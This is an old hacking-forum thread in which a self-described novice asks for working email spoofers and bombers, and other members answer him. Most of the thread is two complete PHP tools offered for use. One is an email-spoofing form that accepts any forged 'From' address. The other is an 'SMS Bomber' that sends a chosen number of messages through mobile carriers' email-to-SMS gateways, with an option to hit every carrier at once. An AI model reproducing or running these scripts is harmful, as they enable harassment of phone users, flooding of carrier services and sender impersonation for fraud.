Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

any1 got sites for email spoof


ghost's Avatar
0 0

im pretty new to online hacking and hellbound. Im really interested and i think im gonna be great. (i got 149 iq level lol).ive been hacking games and mmorpg and stuff for a couple years with chea engine so i learned alot from that. i know html =). ive been fairly interest in the email spoof, but the telnet way doesnt work. so ive been using sites. arabian-outlaw.com <this doesnt work… zomgz.info their bomber works but yahoo doesnt work nodemise.com <doesnt work blackdash.com < under construction so i dont know

so i need help wit getting a spoofer/bomber which works with yahoo as welll and actually work…

the other day i found one but i forgot the link. so my forum brothers please help me. i have notice that this forum is one of the most freindly ones there is.

MAY ALL HACKERS LIFE LONG!!!!!!!!!!!:D


spyware's Avatar
Banned
0 0

Learn php.


ghost's Avatar
0 0

umm. ok ill check it out (search for threads on it):whoa: (thanks)


ghost's Avatar
0 0

go to w3schools.com or just google it. w3schools, though, is one of the best places for learning web languages. It's where I learned javascript and what I currently know about SQL, as well as some more advanced HTML. It has a very good tutorial on PHP, I'm sure you'll find what you're looking for there. PHP is one of the best ways to spoof email; I've tried telnet to yahoo, too, but its pop3 and not smtp; you have to have an smtp server to forge in telnet.

There might be a way to trick yahoo into accepting smtp; I use yPOPs! to get my Yahoo email in Thunderbird, and I can send through my yahoo account without actually using yahoo. What you want to do is most likely going to be done through PHP, unless you want to spend a long time trying other routes… which, of course, is a good learning experience too! But, yeah, basically PHP would be the way to go.


ghost's Avatar
0 0

;)thanks man u helped me alot


ghost's Avatar
0 0

To learn PHP your gonna want www.phpfreaks.com always a good place to start.. and to learn, and advance ;)


ghost's Avatar
0 0

leik woah that zomgz.info site is soo cool :p

[edit]

you know i do have the email spoofing source on zomgz, so if you wanna get it and look it over and maybe edit it to see if you can get it to work for yahoo

then youll learn some php and spoof an email, leik woah

[/edit]


ghost's Avatar
0 0

I'm like w0ah, too! I guess that makes us too. Sleazoid, ftw.


ghost's Avatar
0 0

if(isset($_POST[&#39;submit&#39;])) {

$to = $_REQUEST[&#39;tomail&#39;];
$frommail = $_REQUEST[&#39;frommail&#39;] ;
$subject = $_REQUEST[&#39;subject&#39;] ;
$message = $_REQUEST[&#39;message&#39;] ;
$headers = &quot;From: $frommail&quot;;
$sent = mail($to, $subject, $message, $headers) ;
if($sent){
print &quot;Your mail was sent successfully&quot;;
}else{
print &quot;We encountered an error sending your mail&quot;;
}
}else{

print&quot;&lt;form name=&#92;&quot;contact&#92;&quot; method=&#92;&quot;post&#92;&quot; action=&#92;&quot;spoof.php&#92;&quot;&gt;
  &lt;p&gt;
    &lt;label for=&#92;&quot;email&#92;&quot;&gt;To Email :&lt;/label&gt;
    &lt;input type=&#92;&quot;text&#92;&quot; name=&#92;&quot;tomail&#92;&quot; class=&#92;&quot;textinput&#92;&quot; value=&#92;&quot;&#92;&quot; /&gt;
    &lt;br&gt;
    &lt;label for=&#92;&quot;email&#92;&quot;&gt;From Email :&lt;/label&gt;
    &lt;input type=&#92;&quot;text&#92;&quot; name=&#92;&quot;frommail&#92;&quot; class=&#92;&quot;textinput&#92;&quot; value=&#92;&quot;&#92;&quot; /&gt;
    &lt;br&gt;
    &lt;label for=&#92;&quot;subject&#92;&quot;&gt;Subject :&lt;/label&gt;
    &lt;input type=&#92;&quot;text&#92;&quot; name=&#92;&quot;subject&#92;&quot; class=&#92;&quot;textinput&#92;&quot; value=&#92;&quot;&#92;&quot; /&gt;
    &lt;br&gt;
    &lt;label for=&#92;&quot;message&#92;&quot;&gt;Message :&lt;/label&gt;
    &lt;textarea name=&#92;&quot;message&#92;&quot; cols=&#92;&quot;40&#92;&quot; rows=&#92;&quot;10&#92;&quot; class=&#92;&quot;textinput&#92;&quot;&gt;&lt;/textarea&gt;&lt;br&gt;
&lt;input name=&#92;&quot;submit&#92;&quot; type=&#92;&quot;submit&#92;&quot; value=&#92;&quot;send&#92;&quot; id=&#92;&quot;submit&#92;&quot; class=&#92;&quot;buttonSubmit&#92;&quot;&gt;
  &lt;/p&gt;
&lt;/form&gt;&quot;;
}

?&gt; ```
there u go
p.s. arabian-outlaw.com hasnt been updated in almost a year now
even tho that was my first ever website lol makes me proud

ghost's Avatar
0 0

or if your feeling classy why not an sms bomber? lol

&lt;html&gt;
&lt;head&gt;
&lt;meta http-equiv=&#39;Content-type&#39; content=&#39;text/html;charset=UTF-8&#39;&gt;
&lt;title&gt;SMS Bomber by sleazoid&lt;/title&gt;
&lt;style type=&#39;text/css&#39;&gt;
body {
	font-size: 15px;
	font-family: Tahoma;
	width: 500px;
	color: 06666;
	margin: auto auto;
	padding-top: 10px;
}
div.head {
	font-weight: bolder;
	color: 04466;
}
input.main {
	border-color: 06666;
	border-width: 1px;
	border-style: solid;
	font-family: Tahoma;
	height: 20px;
	font-size: 15px;
	color: 04466;
}
input.submit {
	background-color: #FFFFFF;
	border-color: 06666;
	border-width: 1px;
	border-style: solid;
	font-family: Tahoma;
	height: 20px;
	font-size: 15px;
	color: 06666;
}
textarea.main {
	border-color: 06666;
	border-width: 1px;
	border-style: solid;
	font-family: Tahoma;
	font-size: 15px;
	color: 04466;
}
select.main {
	border-color: 06666;
	border-width: 1px;
	border-style: solid;
	font-family: Tahoma;
	font-size: 15px;
	color: 04466;
}
div.italic {
	font-style: italic;
}
div.sent {
	font-weight: bolder;
}
#form input#to1:focus, input#to2:focus, input#to3:focus, input#from:focus, input#subject:focus, textarea#mess:focus, input#amount:focus {
	background-color: #EEEEEE;
	font-family: Tahoma;
	font-size: 15px;
	color: 04466;
}
&lt;/style&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;div class=&#39;head&#39;&gt;SMS Bomber by sleazoid&lt;/div&gt;
&lt;br /&gt;
&lt;?

$Blocked_number = &quot;5555555555&quot;;

if (!$_POST[&#39;send&#39;]) {

	echo (&quot;
	&lt;form method=&#39;post&#39; id=&#39;form&#39; action=&#39;&#39;&gt;
	Number:
	&lt;br /&gt;
	&lt;input type=&#39;text&#39; maxlength=&#39;3&#39; onblur=&#92;&quot;if(this.value==&#39;&#39;) this.value=&#39;555&#39;;&#92;&quot; onfocus=&#92;&quot;if(this.value==&#39;555&#39;) this.value=&#39;&#39;;&#92;&quot; name=&#39;to1&#39; class=&#39;main&#39; value=&#39;555&#39; id=&#39;to1&#39; size=&#39;2&#39; onkeypress=&#39;var k = event.keyCode ? event.keyCode : event.charCode ? event.charCode : event.which; return /[^A-Za-z]/.test( String.fromCharCode(k) );&#39;&gt; -
	&lt;input type=&#39;text&#39; maxlength=&#39;3&#39; onblur=&#92;&quot;if(this.value==&#39;&#39;) this.value=&#39;555&#39;;&#92;&quot; onfocus=&#92;&quot;if(this.value==&#39;555&#39;) this.value=&#39;&#39;;&#92;&quot; name=&#39;to2&#39; class=&#39;main&#39; value=&#39;555&#39; id=&#39;to2&#39; size=&#39;2&#39; onkeypress=&#39;var k = event.keyCode ? event.keyCode : event.charCode ? event.charCode : event.which; return /[^A-Za-z]/.test( String.fromCharCode(k) );&#39;&gt; -
	&lt;input type=&#39;text&#39; maxlength=&#39;4&#39; onblur=&#92;&quot;if(this.value==&#39;&#39;) this.value=&#39;5555&#39;;&#92;&quot; onfocus=&#92;&quot;if(this.value==&#39;5555&#39;) this.value=&#39;&#39;;&#92;&quot; name=&#39;to3&#39; class=&#39;main&#39; value=&#39;5555&#39; id=&#39;to3&#39; size=&#39;2&#39; onkeypress=&#39;var k = event.keyCode ? event.keyCode : event.charCode ? event.charCode : event.which; return /[^A-Za-z]/.test( String.fromCharCode(k) );&#39;&gt;
	&lt;br /&gt;
	Carrier:
	&lt;br /&gt;
	&lt;select class=&#39;main&#39; name=&#39;carrier&#39; id=&#39;carrier&#39;&gt;
	&lt;option&gt;ALL&lt;/option&gt;
	&lt;option&gt;tmobile&lt;/option&gt;
	&lt;option&gt;cingular&lt;/option&gt;
	&lt;option&gt;virgin-mobile&lt;/option&gt;
	&lt;option&gt;sprint&lt;/option&gt;
	&lt;option&gt;verizon&lt;/option&gt;
	&lt;option&gt;nextel&lt;/option&gt;
	&lt;option&gt;att&lt;/option&gt;
	&lt;option&gt;boost-mobile&lt;/option&gt;
	&lt;option&gt;alltel&lt;/option&gt;
	&lt;option&gt;optus&lt;/option&gt;
	&lt;/select&gt;
	&lt;br /&gt;
	From:
	&lt;br /&gt;
	&lt;input type=&#39;text&#39;  onblur=&#92;&quot;if(this.value==&#39;&#39;) this.value=&#39; From&#39;;&#92;&quot; onfocus=&#92;&quot;if(this.value==&#39; From&#39;) this.value=&#39;&#39;;&#92;&quot; name=&#39;from&#39; class=&#39;main&#39; value=&#39; From&#39; id=&#39;from&#39;&gt;
	&lt;br /&gt;
	Subject:
	&lt;br /&gt;
	&lt;input type=&#39;text&#39; onblur=&#92;&quot;if(this.value==&#39;&#39;) this.value=&#39; Subject&#39;;&#92;&quot; onfocus=&#92;&quot;if(this.value==&#39; Subject&#39;) this.value=&#39;&#39;;&#92;&quot; name=&#39;sub&#39; class=&#39;main&#39; value=&#39; Subject&#39; id =&#39;subject&#39;&gt;
	&lt;br /&gt;
	Message:
	&lt;br /&gt;
	&lt;textarea name=&#39;mess&#39; class=&#39;main&#39; onblur=&#92;&quot;if(this.value==&#39;&#39;) this.value=&#39; Your Message&#39;;&#92;&quot; onfocus=&#92;&quot;if(this.value==&#39; Your Message&#39;) this.value=&#39;&#39;;&#92;&quot; cols=&#39;45&#39; rows=&#39;10&#39; id=&#39;mess&#39;&gt; Your Message&lt;/textarea&gt;
	&lt;br /&gt;
	&lt;label for=&#39;amount&#39;&gt;Amount to Send: &lt;/label&gt;
	&lt;br /&gt;
	&lt;input type=&#39;text&#39; onblur=&#92;&quot;if(this.value==&#39;&#39;) this.value=&#39; Amount&#39;;&#92;&quot; onfocus=&#92;&quot;if(this.value==&#39; Amount&#39;) this.value=&#39;&#39;;&#92;&quot; name=&#39;amount&#39; class=&#39;main&#39; value=&#39; Amount&#39; id=&#39;amount&#39;&gt;
	&lt;br /&gt;
	&lt;br /&gt;
	&lt;input type=&#39;submit&#39; name=&#39;send&#39; value=&#39;Send&#39; class=&#39;submit&#39;&gt;
	&lt;/form&gt;&quot;);

} else {

	if (isset($_POST[&#39;amount&#39;]) && (!is_numeric($_POST[&#39;amount&#39;]))){

		echo &quot;
		&lt;b&gt;Invalid Request.&lt;/b&gt;
		&lt;br/&gt;
		&lt;br /&gt;
		&lt;input type=&#39;submit&#39; value=&#39;Try Again&#39; onClick=&#39;javascript:history.go(-1)&#39; class=&#39;submit&#39;&gt;&quot;;
		exit;

	}

	if ($_POST[&#39;sub&#39;] == &quot; Subject&quot; OR $_POST[&#39;mess&#39;] == &quot; Your Message&quot; OR $_POST[&#39;from&#39;] == &quot; From&quot; OR $_POST[&#39;amount&#39;] == &quot; Amount&quot;){

		echo &quot;
		&lt;b&gt;Invalid Request.&lt;/b&gt;
		&lt;br /&gt;
		&lt;br /&gt;
		&lt;input type=&#39;submit&#39; value=&#39;Try Again&#39; onClick=&#39;javascript:history.go(-1)&#39; class=&#39;submit&#39;&gt;&quot;;
		exit;

	}

	if (!is_numeric($_POST[&#39;to1&#39;]) OR !is_numeric($_POST[&#39;to2&#39;]) OR !is_numeric($_POST[&#39;to3&#39;])) {

		echo &quot;
		&lt;b&gt;Invalid Request.&lt;/b&gt;
		&lt;br /&gt;
		&lt;br /&gt;
		&lt;input type=&#39;submit&#39; value=&#39;Try Again&#39; onClick=&#39;javascript:history.go(-1)&#39; class=&#39;submit&#39;&gt;&quot;;
		exit;

	}

	if (&quot;$to1$to2$to3&quot; == &#39;$Blocked_number&#39;) {

		echo &quot;
		&lt;b&gt;Invalid Request.&lt;/b&gt;
		&lt;br /&gt;
		&lt;br /&gt;
		&lt;input type=&#39;submit&#39; value=&#39;Try Again&#39; onClick=&#39;javascript:history.go(-1)&#39; class=&#39;submit&#39;&gt;&quot;;
		exit;

	}

	$to1 = stripslashes($_POST[&#39;to1&#39;]);
	$to2 = stripslashes($_POST[&#39;to2&#39;]);
	$to3 = stripslashes($_POST[&#39;to3&#39;]);
	$sub = stripslashes($_POST[&#39;sub&#39;]);
	$mess = nl2br(stripslashes($_POST[&#39;mess&#39;]));
	$carrier = stripslashes($_POST[&#39;carrier&#39;]);
	$from1 = stripslashes($_POST[&#39;from&#39;]);
	$from = &quot;$from1@mobile.com &lt;$from1@mobile.com&gt;&quot;;
	$amount = stripslashes($_POST[&#39;amount&#39;]);
	$headers = &#39;MIME-Version: 1.0&#39; . &quot;&#92;r&#92;n&quot;;
	$headers .= &#39;Content-Type: text/html; charset=&quot;iso-8859-1&quot; &#39; . &quot;&#92;r&#92;n&quot;;
	$headers .= &#39;Content-Transfer-Encoding: 8bit&#39; . &quot;&#92;r&#92;n&quot;;
	$headers .= &quot;from: &quot;.$from;

	if ($carrier == cingular) {

		for ($i=1; $i&lt;=$amount; $i++){

			mail(&quot;$to1$to2$to3@cingularme.com&quot;, &quot;$sub&quot;, $mess, $headers);

		}

	} elseif ($carrier == tmobile) {

		for ($i=1; $i&lt;=$amount; $i++){

			mail(&quot;$to1$to2$to3@tmomail.net&quot;, &quot;$sub&quot;, $mess, $headers);

		}

	}

	if ($carrier == virgin-mobile) {

		for ($i=1; $i&lt;=$amount; $i++){

			mail(&quot;$to1$to2$to3@vmobl.com&quot;, &quot;$sub&quot;, $mess, $headers);

		}

	} elseif ($carrier == sprint) {

		for ($i=1; $i&lt;=$amount; $i++){

			mail(&quot;$to1$to2$to3@messaging.sprintpcs.com&quot;, &quot;$sub&quot;, $mess, $headers);

		}

	}

	if ($carrier == verizon) {

		for ($i=1; $i&lt;=$amount; $i++){

			mail(&quot;$to1$to2$to3@vtext.com&quot;, &quot;$sub&quot;, $mess, $headers);

		}

	} elseif ($carrier == nextel) {

		for ($i=1; $i&lt;=$amount; $i++){

			mail(&quot;$to1$to2$to3@messaging.nextel.com&quot;, &quot;$sub&quot;, $mess, $headers);

		}

	}

	if ($carrier == att) {

		for ($i=1; $i&lt;=$amount; $i++){

			mail(&quot;$to1$to2$to3@mms.att.net&quot;, &quot;$sub&quot;, $mess, $headers);

		}

	} elseif ($carrier == boost-mobile) {

		for ($i=1; $i&lt;=$amount; $i++){

			mail(&quot;$to1$to2$to3@myboostmobile.com&quot;, &quot;$sub&quot;, $mess, $headers);

		}

	}

	if ($carrier == alltel) {

		for ($i=1; $i&lt;=$amount; $i++){

			mail(&quot;$to1$to2$to3@message.alltel.com&quot;, &quot;$sub&quot;, $mess, $headers);

		}

	} elseif ($carrier == optus) {

		for ($i=1; $i&lt;=$amount; $i++){

			mail(&quot;$to1$to2$to3@optusmobile.com.au&quot;, &quot;$sub&quot;, $mess, $headers);

		}

	}

	if ($carrier == ALL) {

		for ($i=1; $i&lt;=$amount; $i++){

			mail(&quot;$to1$to2$to3@cingularme.com&quot;, &quot;$sub&quot;, $mess, $headers);
			mail(&quot;$to1$to2$to3@tmomail.net&quot;, &quot;$sub&quot;, $mess, $headers);
			mail(&quot;$to1$to2$to3@vmobl.com&quot;, &quot;$sub&quot;, $mess, $headers);
			mail(&quot;$to1$to2$to3@messaging.sprintpcs.com&quot;, &quot;$sub&quot;, $mess, $headers);
			mail(&quot;$to1$to2$to3@vtext.com&quot;, &quot;$sub&quot;, $mess, $headers);
			mail(&quot;$to1$to2$to3@messaging.nextel.com&quot;, &quot;$sub&quot;, $mess, $headers);
			mail(&quot;$to1$to2$to3@mms.att.net&quot;, &quot;$sub&quot;, $mess, $headers);
			mail(&quot;$to1$to2$to3@myboostmobile.com&quot;, &quot;$sub&quot;, $mess, $headers);
			mail(&quot;$to1$to2$to3@message.alltel.com&quot;, &quot;$sub&quot;, $mess, $headers);
			mail(&quot;$to1$to2$to3@optusmobile.com.au&quot;, &quot;$sub&quot;, $mess, $headers);

		}

	}

	$mess_echo = str_ireplace(&quot;&lt;br /&gt;&quot;, &quot;|&quot;, &quot;$mess&quot;);
	$to = &quot;$to1-$to2-$to3&quot;;

	echo (&quot;
	&lt;div class=&#39;italic&#39;&gt;Your SMS has been sent &lt;b&gt;&quot;.$amount.&quot;&lt;/b&gt; times!&lt;/div&gt;
	&lt;br /&gt;
	To: &lt;div class=&#39;sent&#39;&gt;&quot;.htmlentities($to).&quot;&lt;/div&gt;
	&lt;br /&gt;
	From: &lt;div class=&#39;sent&#39;&gt;&quot;.htmlentities($from1).&quot;&lt;/div&gt;
	&lt;br /&gt;
	Subject: &lt;div class=&#39;sent&#39;&gt;&quot;.htmlentities($sub).&quot;&lt;/div&gt;
	&lt;br /&gt;
	Message: &lt;div class=&#39;sent&#39;&gt;&quot;.htmlentities($mess_echo).&quot;&lt;/div&gt;
	&lt;br /&gt;
	&lt;br /&gt;
	&lt;br /&gt;
	&lt;input type=&#39;submit&#39; value=&#39;Send More&#39; onClick=&#39;javascript:history.go(-1)&#39; class=&#39;submit&#39;&gt;
	&lt;br /&gt;
	&lt;br /&gt;&quot;);

}

?&gt;
&lt;/body&gt;
&lt;/html&gt;```

and netfish is my pope

ghost's Avatar
0 0

lol wheres metroPCS thats like a real good provider hope you find it